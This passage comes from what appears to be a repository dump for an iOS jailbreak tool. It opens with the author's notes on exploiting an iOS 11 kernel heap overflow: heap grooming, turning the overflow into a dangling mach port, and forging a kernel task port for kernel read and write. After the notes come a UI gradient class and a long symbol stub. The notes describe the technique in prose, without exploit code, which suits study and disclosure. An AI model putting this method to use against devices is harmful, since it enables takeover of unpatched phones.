smaller that the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code: 24 | 25 | /* Return attribute set output if requested. */ 26 | if (return_valid) { 27 | ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS; 28 | if (pack_invalid) { 29 | /* Only report the attributes that are valid */ 30 | ab.actual.commonattr &= ab.valid.commonattr; 31 | ab.actual.volattr &= ab.valid.volattr; 32 | } 33 | bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual)); 34 | } 35 | 36 | There's no check that the allocated buffer is big enough to hold at least that. 37 | 38 | Exploitation: 39 | I hope to publish a longer-form write up of this, these are some rough notes on how the exploit works: 40 | 41 | The bug gives you the ability to write 8 zero bytes off the end of a kalloc.16 allocation. Whilst it looks like you 42 | might be able to control a few bits in those bytes I'm not sure you actually can so I focused on exploiting 43 | as if it was writing a NULL pointer off the end. 44 | 45 | This is pretty limited primitive so the first step is to try to enumerate possible things you could do: 46 | * target a reference count, trying to turn the overflow into a UaF bug 47 | * target a lock, trying to turn the overflow into a race condition bug 48 | * target a pointer, trying to leak a reference count 49 | * target a validated datastructure where 0 is an interesting value to change something to 50 | 51 | In the end I chose the first option. There are then two further requirements: 52 | * target needs a reference count in the first 8 bytes 53 | * target has to be overflowable into from kalloc.16 54 | 55 | I chose to target struct ipc_port, which has a reference count field as its second dword thus fulfilling the 56 | first requirement. It is however not allocated in kalloc.16; instead it lives in its own zone (ipc_ports.) 57 | 58 | This means we have to aligned a kalloc.16 zone block just before an ipc_ports one, then overflow out of the 59 | last kalloc.16 allocation in the kalloc.16 block into the first on in ipc_ports. 60 | 61 | There are two tricks we can use to make this easier: 62 | 1) freelist reversal 63 | 2) safely-overflowable allocations 64 | 65 | Freelist Reversal: 66 | zone allocations will come first from intermediate (partially full) pages. This means that if we just start free'ing and 67 | allocating k.16 objects somewhere in the middle of the groom they won't be re-used until 68 | the current intermediate page is either full or empty. 69 | 70 | this provides a challenge because fresh page's freelist's are filled semi-randomly such that 71 | their allocations will go from the inside to the outside: 72 | 73 | | 9 8 6 5 2 1 3 4 7 10 | <-- example "randomized" allocation order from a fresh all-free page 74 | 75 | this means that our final intermediate k.16 and ports pages will look a bit like this: 76 | 77 | | - - - 5 2 1 3 4 - - | - - - 4 1 2 3 5 - - | 78 | kalloc.16 ipc_ports 79 | 80 | if we use the overflow to corrupt a freelist entry we'll panic if it gets allocated, so we 81 | need to avoid that 82 | 83 | the trick is that by controlling the allocation and free order we can reverse the freelists such that 84 | the final intermediate pages will look more like this: 85 | | 1 4 - - - - - 5 3 2 | 2 5 - - - - - 4 3 1 | 86 | kalloc.16 ipc_ports 87 | 88 | at this point we're much more likely to be able to free a kalloc.16 and realloc it for the overflow 89 | such that we can hit the first qword of an ipc_port. 90 | 91 | Safely-Overflowable allocations: 92 | since there are likely to be many candidate allocations we're gonna have to overflow out of before we hit the 93 | target one (which is right at the end, just before the ipc_port) we need to make sure that the allocated objects 94 | on the kalloc.16 page are safe to corrupt with a NULL pointer. 95 | 96 | I use mach message ool_port descriptors for this, as NULL is a valid value. 97 | 98 | Exploit Flow: 99 | We do the groom to reverse the kalloc.16 freelists and start trying to overflow into an ipc_port. 100 | 101 | We know the approximate range of mach port names which contain the to-be-corrupted port; after each overflow attempt 102 | we check each of these ports to see if the port was corrupted. A side-effect of successful corruption is that the 103 | port's io_active flag will be set to zero. We can detect this without causing side-effects using the 104 | mach_port_kobject MIG method. 105 | 106 | Once we find the corrupted port we need to cause a reference to be taken and dropped on it; and more importantly we 107 | need the code path which does this to not check the io_active flag. mach_port_set_attributes will do this for us. 108 | 109 | Now we've turned our NULL pointer write off the end of a kalloc.16 into a dangling mach port :) 110 | 111 | We cause a zone gc, aiming to get the port's memory reused as a kalloc.4096 page. We first get it reused as a ool_ports 112 | descriptor where the ip_context field overlaps with a send right we send ourselves to a canary port. This lets us 113 | learn the approximate address of our objects in the kernel. We then replace the ool_desc with a pipe buffer, 114 | and with a bit of fiddling are able to work out where the dangling mach port is in memory. 115 | 116 | We craft a fake kernel task port in there then clean up. 117 | 118 | Reliability: 119 | The exploit does work, which was my goal :) Reliablilty is something like 30% maybe, it all hinges on how quickly you can do the initial overflow 120 | and test loop. If something else comes in and allocates or frees in kalloc.16 you increase the probability that you 121 | corrupt a freelist entry or something else and will panic. 122 | 123 | I'm sure the exploit can be made more reliable; I've only got it to the point where I've demonstrated that this 124 | bug is exploitable. If you want to take this as a starting point and demonstrate how to improve reliability I'd love 125 | to read a blog post! I imagine this would involve actually monitoring kalloc.16 allocations and understanding what 126 | the failure cases are and how they can be prevented. 127 | 128 | Success rates seem to be highest when the device has been rebooted and left idle for a bit. 129 | 130 | Cleanup: 131 | If the exploit does work it should clean up after itself and not panic the device. The fake kernel task port will stay alive. 132 | 133 | Use the functions in kmem.h to read and write kernel memory. Persist a send-right to tfp0 in there if you want to keep 134 | kernel memory access after this process exits. 135 | 136 | I've tested on: iPod Touch 6G, iPhone 6S, iPhone SE, iPhone 7, iPhone 8 137 | It should work on iOS 11 through iOS 11.3.1 138 | -------------------------------------------------------------------------------- /Rollectra/RollectraGradientView.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface RollectraGradientView : UIView 4 | 5 | @end 6 | -------------------------------------------------------------------------------- /Rollectra/RollectraGradientView.m: -------------------------------------------------------------------------------- 1 | #import "RollectraGradientView.h" 2 | #import 3 | 4 | @implementation RollectraGradientView 5 | 6 | - (instancetype)initWithCoder:(NSCoder *)aDecoder { 7 | self = [super initWithCoder:aDecoder]; 8 | if (self){ 9 | CAGradientLayer *layer = (CAGradientLayer *)self.layer; 10 | layer.startPoint = CGPointMake(0.5, 0); 11 | layer.endPoint = CGPointMake(0.5, 1); 12 | layer.colors = @[(id)[[UIColor colorWithRed:58.0f/255.0f green:70.0f/255.0f blue:91.0f/255.0f alpha:1.0f] CGColor], (id)[[UIColor colorWithRed:83.0f/255.0f green:105.2f/255.0f blue:118.3f/255.0f alpha:1.0f] CGColor]]; 13 | } 14 | return self; 15 | } 16 | 17 | + (Class)layerClass { 18 | return [CAGradientLayer class]; 19 | } 20 | 21 | /* 22 | // Only override drawRect: if you perform custom drawing. 23 | // An empty implementation adversely affects performance during animation. 24 | - (void)drawRect:(CGRect)rect { 25 | // Drawing code 26 | } 27 | */ 28 | 29 | @end 30 | -------------------------------------------------------------------------------- /Rollectra/SpringBoardServices.framework/SpringBoardServices.tbd: -------------------------------------------------------------------------------- 1 | --- 2 | archs: [ armv7, armv7s, arm64 ] 3 | platform: ios 4 | install-name: /System/Library/PrivateFrameworks/SpringBoardServices.framework/SpringBoardServices 5 | current-version: 1 6 | compatibility-version: 1 7 | exports: 8 | - archs: [ armv7, armv7s, arm64 ] 9 | symbols: [ _ADClientAddValueForScalarKey, _ADMonotonicTimeGetCurrent, 10 | _ADPushTimeIntervalForDistributionKeySinceStartTime, _NSStringFromAnalyticsEventType, 11 | _NSStringFromAnalyticsQueryName, _SBActivateAssistantWithContext, _SBAddAlertItemsSuppressionAssertion, 12 | _SBAddBiometricAssertion, _SBAddDownloadingIconForDisplayIdentifier, 13 | _SBAddWallpaperAnimationSuspensionAssertion, _SBAddWebClipToHomeScreen, 14 | _SBAppSetMinimumBackgroundFetchInterval, _SBAppSwitcherServiceRegister, 15 | _SBApplicationDisplayIdentifiers, _SBApplicationMostElevatedStateForProcessIDKey, 16 | _SBApplicationNotificationStateChanged, _SBApplicationRequestedDeviceUnlock, 17 | _SBApplicationStateBeginGeneratingChangeNotifications, _SBApplicationStateDisplayIDKey, 18 | _SBApplicationStateEndGeneratingChangeNotifications, _SBApplicationStateGetDescription, 19 | _SBApplicationStateKey, _SBApplicationStateProcessIDKey, 20 | _SBApplicationStateRunningReasonAssertionIdentifierKey, 21 | _SBApplicationStateRunningReasonAssertionReasonKey, _SBApplicationStateRunningReasonsKey, 22 | _SBAuthLoggingSubsystem, _SBAutoLockTimerCategoryKey, _SBAutoLockTimerFiredNotification, 23 | _SBBiometricLoggingSubsystem, _SBBundlePathForDisplayIdentifier, 24 | _SBCarTriggerUnhandledBackButtonAction, _SBCardItemsControllerClientInterface, 25 | _SBCardItemsControllerServerInterface, _SBClearWallpaperAsset, _SBDataReset, _SBDeactivateAssistant, 26 | _SBDeactivateReachability, _SBDidDismissMiniAlert, _SBDimScreen, _SBDismissSheetView, 27 | _SBDisplayIdentifierForPID, _SBDisplayIdentifiersForPID, 28 | _SBDisplayLayoutBacklightTransitionReasonACPowerChange, _SBDisplayLayoutBacklightTransitionReasonAlert, 29 | _SBDisplayLayoutBacklightTransitionReasonBoot, _SBDisplayLayoutBacklightTransitionReasonCar, 30 | _SBDisplayLayoutBacklightTransitionReasonChargingAccessoryChange, 31 | _SBDisplayLayoutBacklightTransitionReasonCoverSheet, 32 | _SBDisplayLayoutBacklightTransitionReasonExternalAppRequest, 33 | _SBDisplayLayoutBacklightTransitionReasonExternalRequest, 34 | _SBDisplayLayoutBacklightTransitionReasonHomeButton, 35 | _SBDisplayLayoutBacklightTransitionReasonIdleTimer, _SBDisplayLayoutBacklightTransitionReasonKeyboard, 36 | _SBDisplayLayoutBacklightTransitionReasonLanguageChange, 37 | _SBDisplayLayoutBacklightTransitionReasonLiftToWake, 38 | _SBDisplayLayoutBacklightTransitionReasonLockButton, _SBDisplayLayoutBacklightTransitionReasonLogout, 39 | _SBDisplayLayoutBacklightTransitionReasonNotification, 40 | _SBDisplayLayoutBacklightTransitionReasonNotificationCenter, 41 | _SBDisplayLayoutBacklightTransitionReasonOtherButton, _SBDisplayLayoutBacklightTransitionReasonPlugin, 42 | _SBDisplayLayoutBacklightTransitionReasonPocketState, _SBDisplayLayoutBacklightTransitionReasonPrefix, 43 | _SBDisplayLayoutBacklightTransitionReasonProgrammatic, _SBDisplayLayoutBacklightTransitionReasonProx, 44 | _SBDisplayLayoutBacklightTransitionReasonRestoring, 45 | _SBDisplayLayoutBacklightTransitionReasonSOSDismiss, _SBDisplayLayoutBacklightTransitionReasonSiri, 46 | _SBDisplayLayoutBacklightTransitionReasonSmartCover, 47 | _SBDisplayLayoutBacklightTransitionReasonSpringBoardRequest, 48 | _SBDisplayLayoutBacklightTransitionReasonTouch, 49 | _SBDisplayLayoutBacklightTransitionReasonUnknownUserEvent, 50 | _SBDisplayLayoutBacklightTransitionReasonVolumeButton, _SBDisplayLayoutTransitionReasonAccessibility, 51 | _SBDisplayLayoutTransitionReasonAppSwitcher, _SBDisplayLayoutTransitionReasonBreadcrumb, 52 | _SBDisplayLayoutTransitionReasonCarPlay, _SBDisplayLayoutTransitionReasonCommandTab, 53 | _SBDisplayLayoutTransitionReasonControlCenter, _SBDisplayLayoutTransitionReasonExternalRequest, 54 | _SBDisplayLayoutTransitionReasonFloatingApplication, _SBDisplayLayoutTransitionReasonFloatingDock, 55 | _SBDisplayLayoutTransitionReasonFloatingDockRecents, _SBDisplayLayoutTransitionReasonHomeScreen, 56 | _SBDisplayLayoutTransitionReasonLockScreen, _SBDisplayLayoutTransitionReasonNotification, 57 | _SBDisplayLayoutTransitionReasonNotificationCenter, _SBDisplayLayoutTransitionReasonPrefix, 58 | _SBDisplayLayoutTransitionReasonSideAppSwitcher, _SBDisplayLayoutTransitionReasonSiri, 59 | _SBDisplayLayoutTransitionReasonSpotlight, _SBDisplayLayoutTransitionReasonSystemGesture, 60 | _SBDisplayLayoutTransitionReasonWidget, _SBEnableLockScreenBundle, _SBFlashColor, 61 | _SBFrontmostApplicationDisplayIdentifier, _SBGetActiveApplicationStatusBarOrientation, 62 | _SBGetApplicationNetworkFlags, _SBGetApplicationUsesBackgroundNetwork, _SBGetBatteryAwakeTime, 63 | _SBGetBatteryUsageTimesInSeconds, _SBGetCanAddIcons, _SBGetCurrentBacklightFactor, 64 | _SBGetCurrentHomeScreenImage, _SBGetCurrentLockScreenImage, _SBGetDisplayIdentifiers, 65 | _SBGetDisplayIdentifiersForExternalAccessoryProtocols, 66 | _SBGetExternalAccessoryProtocolsForDisplayIdentifier, _SBGetFlattenedIconState, 67 | _SBGetHomeScreenIconMetrics, _SBGetIconPNGData, _SBGetIconState, _SBGetInterfaceOrientation, 68 | _SBGetIsAlive, _SBGetMediaVolume, _SBGetNowPlayingAppBundleIdentifier, _SBGetPendingIconState, 69 | _SBGetRecentSleepsWakes, _SBGetRingerSwitchState, _SBGetScheduledPowerEvents, _SBGetScreenLockStatus, 70 | _SBGetShowingMediaControls, _SBGetShowingMediaHUDAlert, _SBGetSystemVolumeHUDEnabled, 71 | _SBGetWallpaperLegibilitySettings, _SBGetWallpaperOptions, _SBGetWallpaperPreview, 72 | _SBGetWallpaperPreviewSurface, _SBHasPendingOrVisibleAlerts, _SBInterruptKeybagRefetch, 73 | _SBIsNamedRemoteAlertCurrentlyActive, _SBIsReachabilityEnabled, _SBIsSystemApplication, 74 | _SBIsSystemApplicationPID, _SBLocalizedApplicationNameForDisplayIdentifier, _SBLockDevice, 75 | _SBLockDeviceAndFeatures, _SBLogAnalytics, _SBLogAuthenticationAssertions, 76 | _SBLogAuthenticationController, _SBLogAuthenticationKeybag, _SBLogAuthenticationModel, 77 | _SBLogAuthenticationRequests, _SBLogAutoLaunching, _SBLogBiometricResource, _SBLogCommon, 78 | _SBLogCoverSheet, _SBLogDashBoard, _SBLogDashBoardBackdrop, _SBLogDashBoardCallToActionLabel, 79 | _SBLogDashBoardHostedAppViewController, _SBLogDashBoardIrisRecognizer, 80 | _SBLogDashBoardQuickNoteRecognizer, _SBLogDashBoardScrollGestures, _SBLogDoNotDisturbWhileDriving, 81 | _SBLogDockRecents, _SBLogIconDragging, _SBLogIdleTimer, _SBLogLiquidDetection, 82 | _SBLogLockScreenBiometricCoordinator, _SBLogLockScreenBiometricWalletPreArm, 83 | _SBLogLockScreenMesaHomeButtonPasscodeRecognizer, 84 | _SBLogLockScreenMesaHomeButtonSuppressAfterUnlockRecognizer, _SBLogLockScreenMesaUnlockBehaviors, 85 | _SBLogLockScreenMesaWalletPreArm, _SBLogLockScreenNowPlaying, _SBLogMedusaDropDestination, 86 | _SBLogWallet, _SBLoggingSubsystem, _SBOverrideDisplayedDate, _SBPresentPowerDownUI, 87 | _SBPresentRemoteAlert, _SBPresentSheetView, _SBProgrammaticSwitchAppGestureMoveToLeft, 88 | _SBProgrammaticSwitchAppGestureMoveToRight, _SBReboot, _SBRegisterRemoteView, 89 | _SBReloadIconForIdentifier, _SBRemoveWebClipFromHomeScreen, _SBReturnToPreviousAppAtSpecifiedTime, 90 | _SBSAcquireBiometricUnlockSuppressionAssertion, _SBSActivateAssistant, 91 | _SBSActivateAssistantWithContext, _SBSAlertItemsSuppressionAssertionCreate, 92 | _SBSAlertItemsSuppressionAssertionGetTypeID, _SBSAppDragPrivateTypeIdentifier, 93 | _SBSAppLaunchOriginSpotlight, _SBSAppSwitcherQuitAppNotification, _SBSAppSwitcherServiceRegister, 94 | _SBSAppSwitcherServiceRegistrationGetBundleID, _SBSAppSwitcherServiceRegistrationGetIsValid, 95 | _SBSAppSwitcherServiceRegistrationGetTypeID, 96 | _SBSAppSwitcherServiceRegistrationGetViewControllerClassName, _SBSApplicationCanBeLaunched, 97 | _SBSApplicationLaunchFromURLOptionUnlockDeviceKey, 98 | _SBSApplicationLaunchOptionAppLinkOpenStrategyChangedKey, 99 | _SBSApplicationLaunchOptionBreadcrumbBundleIdKey, 100 | _SBSApplicationLaunchOptionBrowserActivationWithNoURLKey, 101 | _SBSApplicationLaunchOptionBrowserReuseTabKey, _SBSApplicationLaunchOptionLaunchInClassicModeKey, 102 | _SBSApplicationLaunchOptionLaunchSuspendedKey, _SBSApplicationLaunchOptionPromptUnlockKey, 103 | _SBSApplicationLaunchOptionRevealIconKey, _SBSApplicationLaunchOptionUnlockDeviceKey, 104 | _SBSApplicationLaunchOptionUpdateAppLinkOpenStrategyKey, _SBSApplicationLaunchingErrorString, 105 | _SBSApplicationRemovabilityDescription, _SBSApplicationServiceIdentifier, 106 | _SBSApplicationShortcutCustomImageIconDataTypeKey, _SBSApplicationShortcutCustomImageIconImageDataKey, 107 | _SBSApplicationShortcutCustomImageIconIsTemplateKey, 108 | _SBSApplicationShortcutItemActivationModeForString, 109 | _SBSApplicationShortcutServiceCustomImageEntitlement, 110 | _SBSApplicationShortcutServiceFullAccessEntitlement, _SBSApplicationShortcutSystemIconTypeForString, 111 | _SBSApplicationTerminationAssertionCreate, _SBSApplicationTerminationAssertionCreateWithError, 112 | _SBSApplicationTerminationAssertionErrorString, 113 | _SBSApplicationTerminationAssertionGetDisplayIdentifier, _SBSApplicationTerminationAssertionGetIsValid, 114 | _SBSApplicationTerminationAssertionGetTypeID, _SBSApplicationTerminationAssertionInvalidate, 115 | _SBSAreMediaControlsShowing, _SBSAssistantActivationContextBundleIDKey, 116 | _SBSBacklightChangeSourceForDisplayLayoutTransitionReason, 117 | _SBSBiometricsServiceUnlockSuppressionAssertionEntitlement, 118 | _SBSBundleIdentifierToPushSettingsUnarchiveFromData, _SBSCleanupClientEntitlementEnforcementPort, 119 | _SBSConvertOpenApplicationSBSKeysToFBSKeysIfNecessary, _SBSCopyApplicationDisplayIdentifiers, 120 | _SBSCopyBundleInfoValueForKeyAndProcessID, _SBSCopyBundlePathForDisplayIdentifier, 121 | _SBSCopyDisplayIdentifierForProcessID, _SBSCopyDisplayIdentifiers, 122 | _SBSCopyDisplayIdentifiersForExternalAccessoryProtocol, _SBSCopyDisplayIdentifiersForProcessID, 123 | _SBSCopyExecutablePathForDisplayIdentifier, _SBSCopyExternalAccessoryProtocolsForDisplayIdentifier, 124 | _SBSCopyFrontmostApplicationDisplayIdentifier, _SBSCopyIconImagePNGDataForDisplayIdentifier, 125 | _SBSCopyIconImagePathForDisplayIdentifier, _SBSCopyInfoForApplicationWithProcessID, 126 | _SBSCopyLocalizedApplicationNameForDisplayIdentifier, _SBSCopyNowPlayingAppBundleIdentifier, 127 | _SBSCreateClientEntitlementEnforcementPort, _SBSCreateCompassCalibrationHUDAssertion, 128 | _SBSDeactivateAssistant, _SBSDeactivateAssistantBySlidingOverTopAppAnimation, 129 | _SBSDisplayLayoutBacklightTransitionReasonForBacklightChangeSource, 130 | _SBSDisplayLayoutElementAppSwitcherIdentifier, _SBSDisplayLayoutElementCarPlayOEMIdentifier, 131 | _SBSDisplayLayoutElementFloatingDockIdentifier, _SBSDisplayLayoutElementHomeScreenIdentifier, 132 | _SBSDisplayLayoutElementLockScreenNavigationIdentifier, _SBSDisplayLayoutElementLoginIdentifier, 133 | _SBSDisplayLayoutElementNowPlayingIdentifier, _SBSDisplayLayoutElementPasscodeIdentifier, 134 | _SBSDisplayLayoutElementSideSwitcherIdentifier, _SBSDisplayLayoutElementSpotlightIdentifier, 135 | _SBSDisplayLayoutElementTodayViewIdentifier, _SBSDisplayLayoutRoleDescription, 136 | _SBSDisplayLayoutRoleIsDefined, _SBSEventObserverEventContinuityUIBecameVisible, 137 | _SBSEventObserverEventContinuityUIWasObscured, _SBSEventObserverEventDimmed, 138 | _SBSEventObserverEventRemoteAlertActivated, _SBSEventObserverEventRemoteAlertDeactivated, 139 | _SBSEventObserverEventSignificantTimeChange, _SBSEventObserverEventUndimmed, 140 | _SBSEventObserverEventUnlocked, _SBSEventObserverGetValueForState, _SBSEventObserverInitialize, 141 | _SBSEventObserverStartObservingEvent, _SBSEventObserverStateContinuityUIIsVisible, 142 | _SBSEventObserverStateDimmedForLock, _SBSEventObserverStopObservingAllEvents, 143 | _SBSEventObserverStopObservingEvent, _SBSGetApplicationState, 144 | _SBSGetMostElevatedApplicationStateForProcessID, _SBSGetNowRecordingPid, _SBSGetScreenLockStatus, 145 | _SBSGetSideSwitchPreference, _SBSHardwareButtonServiceEventConsumerEntitlement, 146 | _SBSHardwareButtonServiceHomeHardwareButtonHintSuppressionEntitlement, _SBSInterruptKeybagRefetch, 147 | _SBSIsMediaHUDAlertShowing, _SBSIsReachabilityEnabled, _SBSIsSystemApplication, 148 | _SBSIsSystemApplicationPID, _SBSLaunchApplicationForDebugging, 149 | _SBSLaunchApplicationForDebuggingWithOptions, _SBSLaunchApplicationWithIdentifier, 150 | _SBSLaunchApplicationWithIdentifierAndLaunchOptions, _SBSLaunchApplicationWithIdentifierAndURL, 151 | _SBSLaunchApplicationWithIdentifierAndURLAndLaunchOptions, 152 | _SBSLocalNotificationWhitelistedUnarchiveFromData, _SBSLockDevice, 153 | _SBSOpenApplicationEnvironmentSecureOnLockScreen, _SBSOpenApplicationLaunchOriginShortcutItem, 154 | _SBSOpenApplicationLayoutRolePrimary, _SBSOpenApplicationLayoutRoleSideLarge, 155 | _SBSOpenApplicationLayoutRoleSideNarrow, _SBSOpenApplicationOptionKeyAdditionalApplications, 156 | _SBSOpenApplicationOptionKeyLaunchEnvironment, _SBSOpenApplicationOptionKeyLayoutRole, 157 | _SBSOpenDataActivationURL, _SBSOpenSensitiveURL, _SBSOpenSensitiveURLAndUnlock, 158 | _SBSOpenURLOptionKeyUseLiveContentDuringTransition, _SBSOverrideDisplayedDate, _SBSPresentPowerDownUI, 159 | _SBSProcessAssertionCopyIdentifier, _SBSProcessAssertionCreateForPID, 160 | _SBSProcessAssertionGetNameForReason, _SBSProcessAssertionGetTypeID, _SBSProcessAssertionIsValid, 161 | _SBSProcessAssertionSetFlags, _SBSProcessAssertionSetInvalidationCallBack, 162 | _SBSProcessIDForDisplayIdentifier, _SBSRegisterDisplayIdentifiersChangedBlock, 163 | _SBSRemoteAlertEntitlement, _SBSRemoteAlertHandleInvalidationErrorDescription, 164 | _SBSRemoteAlertHandleInvalidationErrorDomain, _SBSRemoteAlertServiceIdentifier, 165 | _SBSRemoteCarAlertEntitlement, _SBSRemoteNotificationTopicsWhitelistedUnarchiveFromData, 166 | _SBSRemoteNotificationWhitelistedUnarchiveFromData, _SBSRequestPasscodeUnlockAlertUI, 167 | _SBSRequestPasscodeUnlockUI, _SBSRequiredContextIdsForMedusaDragAndDropForSpotlightOnly, 168 | _SBSSecureAppAssertionErrorDomain, _SBSServerPortHelper, _SBSSetAlertSuppressionContexts, 169 | _SBSSetAlertSuppressionContextsBySectionIdentifier, _SBSSetAllApplicationsShowProgress, 170 | _SBSSetAssistantRecognitionStrings, _SBSSetInterceptsMenuButton, _SBSSetInterceptsMenuButtonForever, 171 | _SBSSetNowPlayingHUDDisabled, _SBSSetNowRecordingPid, _SBSSetReachabilityEnabled, 172 | _SBSSetRequiredContextIdsForMedusaDragAndDropForSpotlightOnly, _SBSSetSideSwitchPreference, 173 | _SBSSetStatusBarShowsActivity, _SBSSetStatusBarShowsActivityForApplication, 174 | _SBSSetStatusBarShowsOverridesForRecording, _SBSSetStatusBarShowsSyncActivity, _SBSSetTypingActive, 175 | _SBSSetVoiceRecognitionAudioInputPaths, _SBSShutDown, _SBSSpringBoardBackgroundServerPort, 176 | _SBSSpringBoardBlockableServerPort, _SBSSpringBoardIconGenerationServerPort, _SBSSpringBoardServerPort, 177 | _SBSStatusBarStyleOverridesAssertionClientInterface, _SBSStatusBarStyleOverridesCoordinatorErrorDomain, 178 | _SBSStatusBarStyleOverridesCoordinatorErrorFailedEntitlementCheckDescription, 179 | _SBSStatusBarStyleOverridesCoordinatorErrorFailedExistingCoordinatorDescription, 180 | _SBSStatusBarStyleOverridesCoordinatorErrorProcessAlreadyRegisteredCoordinatorDescription, 181 | _SBSStatusBarStyleOverridesCoordinatorErrorStyleOverrideKey, _SBSSuspendFrontmostApplication, 182 | _SBSSystemServiceIdentifier, _SBSTagTouchForTypingMenu, _SBSThermalWarningAssertionCreateForBundleID, 183 | _SBSUIActivateRemoteAlert, _SBSUIActivateRemoteAlertWithLifecycleNotifications, 184 | _SBSUIAppDeactivateReachability, _SBSUIAppSetMinimimumBackgroundFetchInterval, 185 | _SBSUIAppSetWantsLockButtonEvents, _SBSUIAppSetWantsVolumeButtonEvents, 186 | _SBSUIAppStarkTriggerUnhandledBackButtonAction, _SBSUIAppSuspend, 187 | _SBSUIIsNamedRemoteAlertCurrentlyActive, _SBSUINullNotificationName, 188 | _SBSUIRemoteAlertOptionActivateForAssistant, _SBSUIRemoteAlertOptionActivateFromAppSwitcher, 189 | _SBSUIRemoteAlertOptionActivateFromStatusBarTap, _SBSUIRemoteAlertOptionActivityContinuationIdentifier, 190 | _SBSUIRemoteAlertOptionAllowCFUserNotificationsOnTop, _SBSUIRemoteAlertOptionCarDisplay, 191 | _SBSUIRemoteAlertOptionCustomActivationReason, _SBSUIRemoteAlertOptionDisableAnimatedTransition, 192 | _SBSUIRemoteAlertOptionDisableFadeInAnimation, _SBSUIRemoteAlertOptionDismissWithHomeButton, 193 | _SBSUIRemoteAlertOptionDismissalAnimationStyle, _SBSUIRemoteAlertOptionEndingCallForUILock, 194 | _SBSUIRemoteAlertOptionHasTranslucentBackground, 195 | _SBSUIRemoteAlertOptionImpersonatesApplicationBundleID, _SBSUIRemoteAlertOptionInitialBackgroundStyle, 196 | _SBSUIRemoteAlertOptionLaunchingInterfaceOrientation, _SBSUIRemoteAlertOptionLaunchingObscured, 197 | _SBSUIRemoteAlertOptionPerformDeferredUIUnlock, _SBSUIRemoteAlertOptionReturnFromLockScreen, 198 | _SBSUIRemoteAlertOptionStark, _SBSUIRemoteAlertOptionStatusBarStyle, 199 | _SBSUIRemoteAlertOptionSuppressSiri, _SBSUIRemoteAlertOptionSwipeDismissalStyle, 200 | _SBSUIRemoteAlertOptionUserInfo, _SBSUIRemoteAlertOptionViewControllerClass, 201 | _SBSUIRemoteAlertOptionWantsWallpaperTunnel, _SBSUndimScreen, 202 | _SBSUserNotificationSettingsWhitelistedUnarchiveFromData, _SBSWallpaperFetchServiceEntitlement, 203 | _SBSWallpaperModificationServiceEntitlement, _SBSWallpaperServiceIdentifier, 204 | _SBSWatchdogAssertionCancel, _SBSWatchdogAssertionCreateForPID, 205 | _SBSWatchdogAssertionGetRenewalInterval, _SBSWatchdogAssertionGetTypeID, _SBSWatchdogAssertionRenew, 206 | _SBScreenTimeCategoryKey, _SBScreenTimeTrackingChangedNotification, 207 | _SBScrollToIconWithDisplayIdentifier, _SBSetAlertSuppressionContexts, 208 | _SBSetAlertSuppressionContextsBySectionIdentifier, _SBSetAllApplicationsShowProgress, 209 | _SBSetAllApplicationsShowSyncIndicator, _SBSetAppIsConnectedToEA, _SBSetApplicationBadgeNumber, 210 | _SBSetApplicationBadgeString, _SBSetApplicationNetworkFlags, _SBSetApplicationShowsProgress, 211 | _SBSetApplicationUsesBackgroundNetwork, _SBSetAssistantRecognitionStrings, _SBSetDisableNowPlayingHUD, 212 | _SBSetIconState, _SBSetInterceptsMenuButton, _SBSetMediaVolume, _SBSetNowPlayingInformation, 213 | _SBSetProceduralWallpaper, _SBSetReachabilityEnabled, _SBSetShowsOverridesForRecording, 214 | _SBSetShowsProgress, _SBSetSuspensionAnimationDelay, _SBSetSystemVolumeHUDEnabled, _SBSetTypingActive, 215 | _SBSetVoiceControlEnabled, _SBSetVoiceRecognitionAudioInputPaths, _SBSetWallpaperAsset, 216 | _SBSetWallpaperImageForLocations, _SBSetWallpaperImageSurfaceForLocations, _SBSetWallpaperVariant, 217 | _SBSetWantsLockButtonEvents, _SBSetWantsVolumeButtonEvents, _SBShowNetworkPromptsIfNecessary, 218 | _SBShowTTYPromptForNumber, _SBShutDown, _SBStarkNowPlayingIdentifier, _SBStarkOEMIdentifier, 219 | _SBStatusBarStyleOverridesAssertionServerInterface, _SBSuspend, _SBSuspendFrontmostApp, 220 | _SBTagTouchForTypingMenu, _SBUnregisterRemoteView, _SBUserNotificationAlertMessageDelimiterKey, 221 | _SBUserNotificationAllowInCarKey, _SBUserNotificationAllowInLoginWindow, 222 | _SBUserNotificationAllowInSetupKey, _SBUserNotificationAllowInStarkKey, 223 | _SBUserNotificationAllowLockscreenDismissalKey, _SBUserNotificationAllowMenuButtonDismissal, 224 | _SBUserNotificationAllowedApplicationsKey, _SBUserNotificationAlternateButtonPresentationStyleKey, 225 | _SBUserNotificationAttachmentImagePath, _SBUserNotificationBehavesSuperModally, 226 | _SBUserNotificationButtonTagForUnlockActionKey, _SBUserNotificationDefaultButtonPresentationStyleKey, 227 | _SBUserNotificationDefaultButtonTag, _SBUserNotificationDefaultResponseLaunchBundleID, 228 | _SBUserNotificationDefaultResponseLaunchURL, _SBUserNotificationDisableIdleSleepWhileVisible, 229 | _SBUserNotificationDismissOnLock, _SBUserNotificationDismissesOverlaysInLockScreen, 230 | _SBUserNotificationDisplayActionButtonOnLockScreen, _SBUserNotificationDontDismissOnUnlock, 231 | _SBUserNotificationExtensionIdentifierKey, _SBUserNotificationExtensionItemsKey, 232 | _SBUserNotificationForcesModalAlertAppearance, _SBUserNotificationGroupsTextFields, 233 | _SBUserNotificationHideButtonsInAwayView, _SBUserNotificationIconImagePath, 234 | _SBUserNotificationLockScreenAlertHeaderKey, _SBUserNotificationLockScreenAlertMessageDelimiterKey, 235 | _SBUserNotificationLockScreenAlertMessageKey, _SBUserNotificationOneButtonPerLine, 236 | _SBUserNotificationOtherButtonPresentationStyleKey, _SBUserNotificationPendInSetupIfNotAllowedKey, 237 | _SBUserNotificationPendWhileKeyBagLockedKey, _SBUserNotificationRemoteServiceBundleIdentifierKey, 238 | _SBUserNotificationRemoteViewControllerClassNameKey, _SBUserNotificationSoundAlertTopicKey, 239 | _SBUserNotificationSoundAlertTypeKey, _SBUserNotificationSoundRepeatDurationKey, 240 | _SBUserNotificationSoundVibrationPatternKey, _SBUserNotificationSystemSoundBehaviorKey, 241 | _SBUserNotificationSystemSoundIDKey, _SBUserNotificationTextAutocapitalizationType, 242 | _SBUserNotificationTextAutocorrectionType, _SBUserNotificationUsesUndoStyle, _SBWillDismissMiniAlert, 243 | 